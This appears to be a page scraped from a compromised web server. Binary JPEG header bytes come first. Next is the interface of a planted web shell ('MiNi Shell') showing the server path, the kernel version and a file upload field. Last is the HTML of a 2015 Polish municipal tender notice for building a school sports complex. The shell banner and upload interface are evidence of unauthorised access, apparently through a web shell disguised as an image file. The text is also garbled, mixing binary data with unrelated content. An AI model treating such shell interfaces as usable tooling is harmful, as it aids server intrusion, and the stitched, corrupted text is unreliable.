JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150907/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20150907/132089-N-2015.html

<p class="kh_header"><b>Nowe Miasto Lubawskie: Budowa kompleksu sportowego wraz z infrastrukturą towarzyszącą przy Zespole Szkolno-Przedszkolnym w Nowym Mieście Lubawskim</b><br>
<b>Numer ogłoszenia: 132089 - 2015; data zamieszczenia: 07.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Nowe Miasto Lubawskie , ul. Rynek 1, 13-300 Nowe Miasto Lubawskie, woj. warmińsko-mazurskie, tel. 56 472-96-32, faks 56 474-27-14.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umnowemiasto.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa kompleksu sportowego wraz z infrastrukturą towarzyszącą przy Zespole Szkolno-Przedszkolnym w Nowym Mieście Lubawskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia podzielony jest na 2 etapy ze względu na realizację zamówienia w latach 2015-2016.
1) Etap I zamówienia wykonawca zobowiązany jest zrealizować w roku 2015 (do 30 listopada) 
w następującym zakresie:
- prace rozbiórkowe (w tym m.in. demontaż ogrodzenia z siatki oraz bramek do piłki ręcznej);
- roboty ziemne, wzmocnienie podłoża (w tym m.in. usunięcie nasypów i gruntów niebudowlanych, usunięcie skarp, wywóz urobku na odległość do 1 km, mechaniczne profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni, ułożenie 2 warstw wzmacniających grunt pod warstwy technologiczne z geokrat);
- budowa murów oporowych żelbetowych;
- opcjonalnie do wykonania w 2015 roku (do 30 listopada) - osadzenie studni kanalizacji deszczowej, wykonanie kolektorów PCV kanalizacji deszczowej (wykonanie opcjonalnego zakresu 
w 2015 roku Zamawiający pozostawia do decyzji wykonawcy).

2) Etap II zamówienia Wykonawca zobowiązany jest zrealizować w terminie określonym dla realizacji całości zamówienia, tj. do 19 sierpnia 2016 roku i obejmuje pozostały do wykonania zakres przedmiotu zamówienia:
- osadzenie studni kanalizacji deszczowej, wykonanie kolektorów PCV kanalizacji deszczowej 
(w przypadku niewykonania tych elementów w 2015 roku);
- wykonanie instalacji odwadniającej kompleks sportowy z przyłączem deszczowym odprowadzającym wody deszczowe do rowu przy ul. Kasztanowej;
- budowa placu zabaw z nawierzchnią syntetyczną wyposażonego w 6 urządzeń zabawowych oraz ogrodzonego z 3 trzech stron ogrodzeniem stalowym, panelowym wys. 1,1 m z bezpiecznym zakończeniem (bez ostrych elementów);
- budowa boiska wielofunkcyjnego 22x32,1 m z nawierzchnią syntetyczną z ogrodzeniem piłkochwytami wys. 6 m; 
- budowa boiska piłkarskiego o wym. 24x44 m z nawierzchnią z trawy syntetycznej ogrodzonego piłko chwytami o wys. 6m; 
- budowa pięciotorowej bieżni sprinterskiej o długości całkowitej 84 m z nawierzchnia syntetyczną;
- budowa dwuścieżkowej skoczni do skoku w dal z rozbiegiem z nawierzchnią syntetyczną długości całkowitej 35 m wraz z zeskocznią o wym. 4,02x8m;
- budowa parkingu dla samochodów osobowych na 28 miejsc postojowych;
- wykonanie stalowego, panelowego ogrodzenia terenu wysokości ok. 2m;
- budowa schodów terenowych;
- montaż na podwalinach betonowych prefabrykowanego kontenera do przechowywania sprzętu sportowego;
- wykonanie wokół poszczególnych obiektów kompleksu sportowego nawierzchni z kostki betonowej oraz trawy naturalnej w rolce;
- wykonanie instalacji oświetleniowej terenu kompleksu sportowego oraz instalacji monitoringu terenu;
- uniemożliwienie, przez cały okres realizacji przedmiotu umowy, dostępu osób postronnych do terenu budowy poprzez jego wygrodzenie i oznakowanie;
- dostawa wyposażenia m.in. boiska wielofunkcyjnego (m.in. zestawy do tenisa, siatkówki 
i badmintona), bramek na boisko do piłki nożnej, urządzeń placu zabaw, ławek z oparciem (9 szt.) oraz ławek bez oparcia (18 szt.);
- konserwacja wbudowanych elementów i urządzeń placu zabaw zgodnie z zaleceniami producentów 
w okresie gwarancji. 
2. Zamawiający wprowadza następujące zmiany w dokumentacji projektowej dot. urządzeń placu zabaw:
a)	słupy konstrukcyjne o przekroju minimalnym 90x90 mm o zaoblonych krawędziach z drewna bezrdzeniowego przecieranego krzyżowo (dot. zestawu zabawowego, huśtawki dwuosobowej, huśtawki jednoosobowej, domku z ławeczkami i lokomotywy),
b)	balustrady pełne z HDPE/HPL lub ze sklejki wodoodpornej (dot. zestawu zabawowego i domku 
z ławeczkami),
c)	drążki drabinek ocynkowane i malowane proszkowo,
d)	ślizg z blachy kwasoodpornej z bokami z HDPE lub ze sklejki wodoodpornej,
e)	siedziska huśtawki: gumowa deseczka z rdzeniem stalowym (wykreślenie siedzisk dla maluchów),
f)	drążki uchwytów ocynkowane i malowane proszkowo (dot. lokomotywy).
Ponadto, w przypadku urządzeń placu zabaw podane w dokumentacji projektowej wymiary są wymiarami rekomendowanymi, jednakże wymiary zaoferowanych urządzeń mogą się różnić (być mniejsze lub większe) o 15% w stosunku do podanych w dokumentacji projektowej.   
3. Zamawiający dopuszcza zastąpienie georusztu trójosiowego georusztem dwuosiowym posiadającym parametry nie gorsze od georusztu trójosiowego wskazanego w dokumentacji projektowej.
4. Z uwagi na realizację I etapu zamówienia w okresie jesiennym należy podkreślić, że Wykonawca jest zobowiązany do prowadzenia prac ziemnych w sposób zapobiegający uplastycznianiu gruntów spoistych w wykopach.
5. W przypadku boiska piłkarskiego Zamawiający dopuszcza możliwość zaoferowania następujących wariantów nawierzchni boiska do piłki nożnej:
a) wariant I nawierzchni: trawa tkana wskazana w dokumentacji projektowej z tą zmianą, iż zamiast granulatu SBR należy wypełnić nawierzchnię EPDM-em z recyklingu (szczegóły dot. wariantu I 
w projekcie budowlanym - załączniku B do SIWZ);
b) wariant II: sztuczna trawa taftowana o wysokości 60 mm (wariant II stanowi odstępstwo od wymagań wskazanych w dokumentacji projektowej):
Minimalne wymagania dot. nawierzchni z trawy syntetycznej 60 mm: 
1.	Typ włókna 					min. 12 włókien w jednym pęczku o 2 różnych kolorach  
2.	Wysokośc włókna			 	60 mm
3.	Grubość włókna monofil			min. 300 mikronów 
4.	Ilość pęczków 				min. 7 800 pęczków
5.	Ilość włókien				min. 110 000 włókien
6.	Dtex					min. 17 500 
7.	Całkowita waga nawierzchni			min. 2 850 gr/m2 
8.	Kształt włókna 				włókno główne monofilowe z wyprofilowanym rdzeniem      
9.	Wypełnienie nawierzchni 			EPDM z recyklingu 
6. W przypadku boiska wielofunkcyjnego Zamawiający dopuszcza możliwość zaoferowania następujących wariantów nawierzchni boiska wielofunkcyjnego:
a) wariant I nawierzchni wskazany został w dokumentacji projektowej (załącznik B do niniejszej SIWZ);
b) wariant II stanowi odstępstwo od wymagań wskazanych w dokumentacji projektowej. Wymagane parametry wariantu II:

PARAMETR	WARTOŚĆ
1. Tarcie ( opór poślizgu ), stopnie, PTV	większe lub równe 83 ( stan suchy )
	większe lub równe 57 ( stan mokry )
2. Wytrzymałość na rozciąganie, N/mm2	 większe lub równe 0,42
3. Wydłużenie podczas zerwania, %	większe lub równe 54
4. Odporność na zużycie, Taber, g	mniejsze lub równe 1,1
5. Odkształcenie pionowe, mm większe lub równe 2
6. Zachowanie się piłki odbitej pionowo:	
     piłka koszykowa, m/%	większe lub równe 101
7. Grubość, mm:	większe lub równe 14
8. Amortyzacja, %:	mniejsze lub równe 35

7. W przypadku bieżni sprinterskiej Zamawiający dopuszcza możliwość zaoferowania następujących wariantów nawierzchni bieżni sprinterskiej:
a) wariant I nawierzchni wskazany został w dokumentacji projektowej (załącznik B do niniejszej SIWZ);
b) wariant II stanowi odstępstwo od wymagań wskazanych w dokumentacji projektowej. Wymagane parametry wariantu II:

PARAMETR	WYNIK
1. Tarcie ( opór poślizgu ), stopnie, PTV	większe lub równe 83 ( stan suchy )
	większe lub równe 58 ( stan mokry )
2. Wytrzymałość na rozciąganie, N/mm2	większe lub równe 0,97
3. Wydłużenie podczas zerwania, %	większe lub równe 49
4. Odporność na zużycie, Taber, g	mniejsze lub równe 3,02
5. Odporność po sztucznym starzeniu:	
a). Odporność na zużycie, Taber, mm	mniejsze lub równe 3,1
b).  Zmiana barwy, stopnie skali szarej	4
6. Odporność po przyspieszonym starzeniu:	
a) Wytrzymałość na rozciąganie, N/mm2	większe lub równe 0,90
b). Wydłużenie podczas zerwania, %	większe lub równe  44
7. Amortyzacja, % ( 23 st. C )	mniejsze lub równe 42
8. Odkształcenie pionowe, mm ( 23 st. C )	mniejsze lub równe 2,6

8. Odstępstwa od dokumentacji projektowej wskazane w pkt. 5. - 7. dotyczą wyłącznie nawierzchni, podbudowy wskazane w dokumentacji projektowej pozostają niezmienione.
9. Szczegółowy opis przedmiotu zamówienia określa dokumentacja projektowa oraz specyfikacje techniczne wykonania i odbioru robót budowlanych stanowiące załącznik B do SIWZ. 
10. Sposób realizacji przedmiotu zamówienia określa również treść projektu umowy stanowiący załącznik A do SIWZ.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.00-8, 45.10.00.00-8, 45.21.22.21-1, 45.34.00.00-2, 45.23.32.50-6, 42.23.13.00-8, 45.31.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 19.08.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 10 000,00 zł (słownie: dziesięć tysięcy złotych). Szczegóły dotyczące wadium w SIWZ</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie niniejszego warunku ocena jego spełniania nastąpi na podstawie złożonego przez wykonawcę wraz z ofertą oświadczenia, o którym mowa w pkt. III.4.1)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonawca wykonał należycie oraz prawidłowo ukończył zgodnie z zasadami sztuki budowlanej, co najmniej dwie roboty budowlane polegające na budowie kompleksu sportowego składającego się co najmniej z boiska wielofunkcyjnego o nawierzchni syntetycznej poliuretanowej oraz boiska do piłki nożnej o nawierzchni z trawy syntetycznej. Każda z wykazanych przez wykonawcę robót spełniająca wskazane wyżej wymagania, musi swym zakresem obejmować również wykonanie drenażu i odwodnienia liniowego oraz oświetlenia terenu, a wartość zrealizowanego kontraktu na każdą z robót musi być nie niższa niż 1 200 tys. zł brutto. Ocena spełniania niniejszego warunku nastąpi na podstawie złożonych przez wykonawcę wraz z ofertą oświadczeń i dokumentów wskazanych w pkt. III.4.1)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie niniejszego warunku ocena jego spełniania nastąpi na podstawie złożonego przez wykonawcę wraz z ofertą oświadczenia, o którym mowa w pkt. III.4.1)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować: a) osobą wyznaczoną do pełnienia funkcji kierownika budowy posiadającą uprawnienia budowlane w specjalności konstrukcyjno-budowlanej (lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów), 5 lat stażu pracy zawodowego, w tym min. 3 lata jako kierownik budowy, wykształcenie wyższe techniczne, należącą do Izby Inżynierów Budownictwa, b) osobą wyznaczoną do pełnienia funkcji kierownika robót w zakresie sieci wodociągowych i kanalizacyjnych posiadającą uprawnienia budowlane w zakresie sieci wodociągowych i kanalizacyjnych, 3 lata stażu pracy zawodowego, w tym min. 1 rok jako kierownik budowy lub robót w zakresie sieci kanalizacyjnych, wykształcenie wyższe lub średnie techniczne, należącą do Izby Inżynierów Budownictwa, c) osobą wyznaczoną do pełnienia funkcji kierownika robót w zakresie sieci elektrycznych i elektroenergetycznych posiadającą uprawnienia budowlane w zakresie sieci elektrycznych i elektroenergetycznych, 3 lata stażu pracy zawodowego, w tym min. 1 rok jako kierownik budowy lub robót w zakresie sieci kanalizacyjnych, wykształcenie wyższe lub średnie techniczne, należącą do Izby Inżynierów Budownictwa. Osoby nie posiadające obywatelstwa polskiego oceniane będą zgodnie z przepisami ustawy z dnia 18 marca 2008r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008r. , Nr 63, poz. 394, z późn. zm.) oraz ustawy z dnia 15 grudnia 2000r. o samorządach zawodowych architektów oraz inżynierów budownictwa (Dz. U. z 2013 r. poz. 932 z późn. zm.). Ocena spełniania niniejszego warunku nastąpi na podstawie złożonych przez wykonawcę wraz z ofertą oświadczeń i dokumentów wskazanych w pkt. III.4.1)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać środki finansowe lub zdolność kredytową w wysokości nie niższej niż 1 mln zł (w okresie nie wcześniej niż 3 miesiące przed upływem terminu składania ofert). Ocena spełniania niniejszego warunku nastąpi na podstawie złożonych przez wykonawcę wraz z ofertą oświadczeń i dokumentów wskazanych w pkt. III.4.1)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Szczegóły dotyczące wszystkich dokumentów na potwierdzenie spełniania wymagań określonych przez Zamawiającego znajdują się w SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres gwarancji oraz okres rękojmi za wady - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Warunki zmian postanowień umowy zawiera projekt umowy stanowiący załącznik A do SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://nml-um.bip-wm.pl/public/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Nowym Mieście Lubawskim, ul. Rynek 1, 13 - 300 Nowe Miasto Lubawskie, pok. nr 19.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.09.2015 godzina 10:00, miejsce: Oferty należy składać w siedzibie Urzędu Miejskiego w Nowym Mieście Lubawskim (ul. Rynek 1, 13 - 300 Nowe Miasto Lubawskie), pok. nr 29 (sekretariat).</p>
